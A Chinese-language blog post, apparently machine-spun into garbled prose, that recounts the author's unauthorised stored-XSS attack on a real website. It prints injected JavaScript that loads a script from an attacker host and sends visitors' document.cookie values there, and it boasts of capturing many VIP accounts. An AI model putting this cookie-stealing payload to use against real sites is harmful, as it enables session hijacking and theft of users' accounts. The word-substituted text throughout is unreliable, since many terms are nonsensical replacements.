盗窃目的网站大量

盗窃目的网站大量

前言


以前做网站时有做代码防御 XSS(Cross Site Script)
攻击,可是却只处于领悟的级差,并不知道其中具体的原理,更别说使用了。目前有朋友要求自己帮助他
Hack
一个网站,达到自然的目标。思考来合计去,最终想了一套方案,并最后水到渠成进行。现在回忆起来,整套解决方案中,其实首要就是
XSS。

(   本文不会宣布目的网站地址。首假若为着互换技术,以协理大家在 Web
开发中更好地防御 XSS。

看作品标题说得相比牛,其实我也不会去修改他们的密码,太坏的事我可无法干。
🙂   )

 

XSS 简述


关于 XSS
的授课,网上或者比较多的,参照百度百科吧:http://baike.baidu.com/view/50325.htm

 

攻击流程


倘诺我想偷走 www.Target.com
中的其他用户,并动用他们的身份来报到该站点。那么自己还要还需要一个和谐的服务器,假使为
www.HackHost.com。然后,使用自家自己的帐号登录到
Target.com,然后在自身的个人页面中付出脚本(例如在个人档案中投入势必的剧本。关于什么提交,前面再琢磨。)。该脚本内容相比较简单,如下:

var cb = document.createElement(“script”); cb.src =
“www.HackHost.com/clientHacker.js?”

  • new Date().getTime(); document.body.appendChild(cb);

如此这般,每个浏览我的村办页面的其他用户,都会活动下载
www.HackHost.com/clientHacker.js 这些 javascript
文件实施。这个文件是安排到自己的 HackHost.com
服务器上的,我可以在里面参预任意的台本。这样,当前登录的用户的凡事客户端都地处这几个剧本的支配当中。

接下去,可以把该用户的 cookie 通过 document.cookie 得到,然后提交到
HackHost.com。由于此处已经跨域,所以无法使用 Ajax
提交。跟刚刚下载文件一律,能够凑合链接地址再下载一个新的公文就足以了。例如,下载:’www.HackHost.com/cookieGetter.ashx?c=’

  • document.cookie。

而服务端接收到这么些请求后,可以把
库克ie、IP、时间等记录下来。这样就可以便宜自己渐渐地解析各种请求。

 

所需工具


这一次 Hack 涉及到的工具不多,首假使用 fiddler 分析和伪造各种 HTTP 请求。

除此以外,还会引用到事先秒杀的片段类库(见:《“秒杀”心得》),首要用以
.NET 环境下采纳代码提交构造好的 HTTP 请求。

 

结果截图


图片 1

好多 VIP 帐号啊。 🙂

 

难点


实际上 XSS
的困难在于,如何把脚本注入到目的网站中。这亟需分析目的网站的输入过滤规则,然后构造不满足过滤规则而且可以最后实施的
js。这篇作品里面讲的还不易:《一只完整的XSS
wrom实现流程
》。

别处,用 js 并不可能取得到完全的 Cookie 值,这是因为假诺 Cookie 中带有
HttpOnly 标记的话,js 是无法读取的。例如,asp.net 网站的 SessionId
对应的客户端 Cookie 就是标志了 HttpOnly的。否则,大家就可以通过 js
获取到近期可用的 Session,并伪造该 Session 举办(Session 威迫)。

 

小结


完全上来说,这一次的抨击是相比简单的。而且本次的靶子网站对于我的安全性确实没有做什么工作,很自由我就把
js 注入了。另外,他们还把用户标识保存在 cookie
中,就算标识是加密后的,可是这不影响自己的使用境况。

后面做过秒杀,可是算不上 Hack,这是率先次得逞
Hack,所以写这篇作品简单回忆一下。 🙂

 

 

(九月最少一篇总计,总算是在本月最后关口提交上来了,差一点断,哈。)

admin

网站地图xml地图